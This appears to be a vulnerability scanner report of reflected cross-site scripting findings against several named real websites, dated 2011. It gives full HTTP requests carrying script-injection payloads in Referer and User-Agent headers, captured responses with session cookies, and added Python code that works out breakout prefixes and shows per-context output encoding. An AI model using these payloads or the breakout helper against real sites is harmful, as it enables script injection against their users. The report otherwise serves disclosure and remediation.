Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 600
Connection: close
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c87df<script>alert(1)</script>93af6c2ba17 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: c87df<script>alert(1)</script>93af6c2ba17
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 15:30:05 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload efdaf<script>alert(1)</script>44c02aedbc6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;
Referer: efdaf<script>alert(1)</script>44c02aedbc6

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 02 Feb 2011 16:18:36 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: Close
The value of the User-Agent HTTP header is copied into an HTML comment. The payload a5b3f--><script>alert(1)</script>e7875b8ff69 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request

GET /XBE/Popups/InfoPopup.aspx?hotel=11536&hotelgroup=5303&lang=1&view=28&shell=9adc412feca446b4bdccea9aa721a765&template=1e8778f11833464cb60925c02a37f3dd&room=ST1K&media=2666f74ea41c4e9db3ec8835549ad2a4&TB_iframe=true&width=400&height=400&modal=false HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a5b3f--><script>alert(1)</script>e7875b8ff69
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7852
Date: Tue, 01 Feb 2011 15:39:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript" src=".. ...[SNIP]...
<!-- Processing Time: 0.097028638920135 | Server: 32 | Client IP: 96.17.171.172 | Client User Agent: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a5b3f--><script>alert(1)</script>e7875b8ff69" -->
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 9223a<a>b8515daf8ba was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request

GET /XBE/Popups/InfoPopup.aspx HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9223a<a>b8515daf8ba
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 174
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:35:41 GMT
Connection: close
<!-- Processing Time: 0.018823581552306 | Server: 32 | Client IP: 69.31.59.40 | Client User Agent: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9223a<a>b8515daf8ba" -->
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 2736c--><script>alert(1)</script>d72e32cd699 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /rez.aspx?&Chain=5303&start=16& HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2736c--><script>alert(1)</script>d72e32cd699
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 15:35:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62635
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the User-Agent HTTP header is copied into an HTML comment. The payload a2727--><script>alert(1)</script>35328277103 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an attacker-chosen User-Agent to a cross-domain request. The techniques that once made this possible relied on client-side plugins such as Flash to issue requests with arbitrary headers; where such a technique is available in the victim's browser, it can probably be leveraged to exploit this flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819 HTTP/1.1
Host: gc.synxis.com
Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10a2727--><script>alert(1)</script>35328277103
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2932"><script>alert(1)</script>4fce17b3452 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Request
GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: b2932"><script>alert(1)</script>4fce17b3452
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 14:32:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <!-- saved from url=(0013)about:internet --> <hea ...[SNIP]... <iframe src="http://pingomatic.com/ping/?title=Flyer&blogurl=b2932"><script>alert(1)</script>4fce17b3452&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo ...[SNIP]...
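Each finding in this report states the syntactic context in which the submitted value was reflected (an HTML comment, a double-quoted attribute, a quoted JavaScript string) and picks a breakout prefix to match; the iframe src attribute above is one such case. The following added example is not Burp's code and not code from any site named in this report. It performs that classification offline: given a response body and the canary that was sent in a header, it finds every reflection, walks the preceding markup to decide what context it landed in, and returns the prefix that closes that context. The CANARY value, the example.test and pingomatic.test URLs and the whole SAMPLE_BODY are constructed for the demonstration, not captured traffic.

```python
import re
from dataclasses import dataclass

# Added example, not Burp's code and not code from any site in this report.
# Given a response body and the canary that was sent in a header, it locates
# every reflection and reports the syntactic context it landed in, plus the
# prefix that would close that context before injected markup.


@dataclass(frozen=True)
class Reflection:
    offset: int    # index of the canary in the body
    context: str   # html_comment, js_string_dq, js_string_sq, js_code, attr_dq, attr_sq, tag, html_text
    breakout: str  # what to put in front of <script>alert(1)</script> to leave the context


def _open_quote(fragment: str, backslash_escapes: bool) -> str:
    """Return the quote character still open at the end of fragment, or ''.

    JavaScript strings honour backslash escapes; HTML attribute values do not.
    Script comments and regex literals are not modelled (known limitation).
    """
    quote = ""
    i = 0
    while i < len(fragment):
        ch = fragment[i]
        if quote:
            if backslash_escapes and ch == "\\":
                i += 2          # skip the escaped character
                continue
            if ch == quote:
                quote = ""
        elif ch in "\"'":
            quote = ch
        i += 1
    return quote


def context_of(before: str):
    """Classify the position at the end of `before` (all markup preceding the canary)."""
    # Open HTML comment: the last "<!--" has no "-->" after it.
    c = before.rfind("<!--")
    if c != -1 and "-->" not in before[c:]:
        return "html_comment", "-->"
    # Open inline script: the last "<script ...>" has no "</script" after it.
    opens = list(re.finditer(r"<script\b[^>]*>", before, re.I))
    if opens and not re.search(r"</script", before[opens[-1].end():], re.I):
        q = _open_quote(before[opens[-1].end():], backslash_escapes=True)
        if q:
            return ("js_string_dq" if q == '"' else "js_string_sq"), "</script>"
        return "js_code", "</script>"
    # Inside a tag: the last "<" has no ">" after it.
    t = before.rfind("<")
    if t != -1 and ">" not in before[t:]:
        q = _open_quote(before[t:], backslash_escapes=False)
        if q:
            return ("attr_dq" if q == '"' else "attr_sq"), q + ">"
        return "tag", ">"
    return "html_text", ""


def find_reflections(body: str, canary: str):
    """All occurrences of canary in body, each with its context and breakout."""
    return [Reflection(m.start(), *context_of(body[: m.start()]))
            for m in re.finditer(re.escape(canary), body)]


# Constructed sample body modelled on the reflections in this report; it is
# not a capture from any of the sites named here.
CANARY = "zz9pzza"
SAMPLE_BODY = (
    "<!DOCTYPE html><html><head>\n"
    '<!-- Client User Agent: "Mozilla/4.0 ' + CANARY + '" -->\n'
    '<script>var referrer = "http://example.test/?q=' + CANARY + '";</script>\n'
    "<script>var tracker = 'ref=" + CANARY + "';</script>\n"
    "</head><body>\n"
    '<iframe src="http://pingomatic.test/ping/?blogurl=' + CANARY + '&rssurl="></iframe>\n'
    "<input type=\"hidden\" name=\"url\" value='" + CANARY + "' />\n"
    "<p>You came from " + CANARY + "</p>\n"
    "</body></html>"
)

if __name__ == "__main__":
    for r in find_reflections(SAMPLE_BODY, CANARY):
        print("offset %5d  context %-13s  breakout %r" % (r.offset, r.context, r.breakout))
```

The checks run from outermost to innermost syntax (comment, then script block, then tag) because an open comment makes everything after it inert regardless of what it contains. A canary that lands in js_code (inside a script but outside any string) needs no quote at all, which is why the breakout there is still the closing script tag.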
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb9d2</script><script>alert(1)</script>f66207f6f2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
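The remediation notes in this report (comment context earlier in this section, script context here) say what not to do; the added example below shows the encoding that makes each context safe, and also covers the double-quoted attribute context reported for several Referer findings, which has no remediation note of its own. It is not code from any application named in this report. The encoders and the fragment templates are the editor's, modelled on the reflections shown in the findings; the payloads are the ones quoted in the findings. breaks_out() renders each payload raw (the vulnerable behaviour) and encoded, and reports whether it left its context.

```python
import html
import json
import re

# Added example, not code from any application named in this report. Each
# encoder targets exactly one output context that the findings describe, and
# breaks_out() checks that the report's own payloads no longer leave it.


def encode_for_html_comment(value: str) -> str:
    """Encode data written inside an HTML comment.

    A comment ends at "-->" (and "--!>"), so the encoded value must never
    contain "--" or ">". Every hyphen that is followed by another hyphen gets
    a space after it, and ">" becomes "&gt;" (entities are not decoded inside
    comments, but the parser no longer sees a ">" either, which is the point).
    Better still is not to echo request data into comments at all.
    """
    value = re.sub(r"-(?=-)", "- ", value)
    return value.replace(">", "&gt;")


def encode_for_double_quoted_attribute(value: str) -> str:
    """Encode data written inside a double-quoted attribute value.

    html.escape(quote=True) turns &, <, >, " and ' into entities, so the
    value cannot close the attribute early or start a new tag.
    """
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Encode data written inside a quoted JavaScript string in an inline script.

    json.dumps handles backslashes, double quotes and control characters.
    Single quotes, <, > and & are then written as Unicode escapes (\\u003c
    for <), so the value is safe in either quote style and "</script" can
    never appear in the page source: the HTML parser ends a <script> block at
    the first "</script" it sees regardless of JavaScript quoting. The result
    carries no surrounding quotes so it drops into an existing literal.
    """
    encoded = json.dumps(value)[1:-1]
    for ch in "'<>&":
        encoded = encoded.replace(ch, "\\u%04x" % ord(ch))
    return encoded


# Fragments modelled on the reflections in this report, paired with the
# encoder that fits each context.
TEMPLATES = {
    "comment":   ('<!-- Client User Agent: "%s" -->', encode_for_html_comment),
    "attribute": ('<input type="hidden" name="url" value="%s" />', encode_for_double_quoted_attribute),
    "js_dq":     ('<script>var ref = "%s";</script>', encode_for_js_string),
    "js_sq":     ("<script>var ref = '%s';</script>", encode_for_js_string),
}

# Payloads quoted in the findings, keyed by the context each one targets.
REPORT_PAYLOADS = {
    "comment":   "2736c--><script>alert(1)</script>d72e32cd699",
    "attribute": 'b2932"><script>alert(1)</script>4fce17b3452',
    "js_dq":     "f4484</script><script>alert(1)</script>1cc7f90f443",
    "js_sq":     "40b07'-alert(1)-'d5a8a9aeffc",
}


def render(context: str, value: str, safe: bool = True) -> str:
    """safe=False reproduces the vulnerable raw echo; safe=True encodes first."""
    template, encoder = TEMPLATES[context]
    return template % (encoder(value) if safe else value)


def breaks_out(context: str, value: str, safe: bool = True) -> bool:
    """True if value escapes its context in the rendered fragment."""
    out = render(context, value, safe)
    scripts = len(re.findall(r"<script", out, re.I))
    if context == "comment":
        # A contained comment has exactly one ">" and it is the closing one.
        return out.count(">") != 1 or not out.endswith("-->")
    if context == "attribute":
        # The template writes six double quotes; a seventh, or any tag, means
        # the attribute was closed early.
        return out.count('"') != 6 or scripts != 0
    if context == "js_dq":
        unescaped = len(re.findall(r'(?<!\\)"', out))
        return unescaped != 2 or scripts != 1
    if context == "js_sq":
        return out.count("'") != 2 or scripts != 1
    raise ValueError(context)


def audit() -> dict:
    """Map each context to (breaks out when echoed raw, breaks out when encoded)."""
    return {ctx: (breaks_out(ctx, p, safe=False), breaks_out(ctx, p, safe=True))
            for ctx, p in REPORT_PAYLOADS.items()}


if __name__ == "__main__":
    for ctx, (raw, enc) in audit().items():
        print("%-9s raw echo breaks out: %-5s encoded breaks out: %s" % (ctx, raw, enc))
```

The point of keeping one encoder per context is that a single "HTML encode" pass does not cover the script case: entity-encoded data inside a script block is not decoded by the JavaScript engine, and a double-quote escape alone does nothing against a closing script tag.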
Request
GET / HTTP/1.1
Host: msn.whitepages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fb9d2</script><script>alert(1)</script>f66207f6f2c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40b07'-alert(1)-'d5a8a9aeffc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=40b07'-alert(1)-'d5a8a9aeffc
Response (redirected)
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:41:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D40b07%27%2Dalert%281%29%2D%27d5a8a9aeffc; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=MHEFFOICFMALHBAGDLCEHAGC; path=/
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2a26"><script>alert(1)</script>4e16ea664ee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: updates.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e2a26"><script>alert(1)</script>4e16ea664ee
Response
HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 02 Feb 2011 15:42:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: traveler_update_visitor=B704221B7BC5130; path=/; expires=Tue, 02 Feb 2016 15:42:40 GMT
Set-Cookie: traveler_update_session=BAh7CToOcmV0dXJuX3RvIgYvOhFsYXN0X3JlcXVlc3RABjoQbGFzdF92aWV3%250AZWRABiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--1848cb98c769e595ff92d0c71ba7b529ea2e7b8c; path=/
Status: 200 OK
X-Runtime: 0.05162
ETag: "e3805ab73252db7f49504ae9518d880e"
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 32775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c422"><script>alert(1)</script>79e384fb3bc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Request
GET /flight_status HTTP/1.1
Host: updates.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6c422"><script>alert(1)</script>79e384fb3bc
Response
HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Wed, 02 Feb 2011 15:42:42 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Set-Cookie: traveler_update_visitor=ED7A2C9950CD932; path=/; expires=Tue, 02 Feb 2016 15:42:42 GMT
Set-Cookie: traveler_update_session=BAh7CToOcmV0dXJuX3RvIhMvZmxpZ2h0X3N0YXR1czoRbGFzdF9yZXF1ZXN0%250AQAY6EGxhc3Rfdmlld2VkQAYiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--2e47e384fcf267e3ac43c1147866adf06a386ff2; path=/
Status: 200 OK
X-Runtime: 0.01426
ETag: "50fd0e0e1c4599312e9b792d296674b6"
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 20517
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc7c2"><script>alert(1)</script>4d661957df4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the reflected data is submitted in a request header rather than in the URL or body, this behaviour is harder to exploit against another user: a victim's browser will not attach an arbitrary header to a cross-domain request, and the techniques that once made this possible relied on client-side plugins such as Flash. The Referer header is a partial exception, because its value is the URL of the page the victim navigated from: an attacker who hosts a page whose URL carries the payload and links the victim from it to this endpoint controls the reflected value without any plugin. That route only works if the payload survives the trip, that is, if the browser sends the characters the payload needs (quotes, < and >) in the query string unencoded or the application URL-decodes the header before echoing it, and it is closed by a referrer policy that strips the path and query from cross-origin referrers. The limitation therefore reduces, but does not remove, the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cc7c2"><script>alert(1)</script>4d661957df4
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:38:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 94428
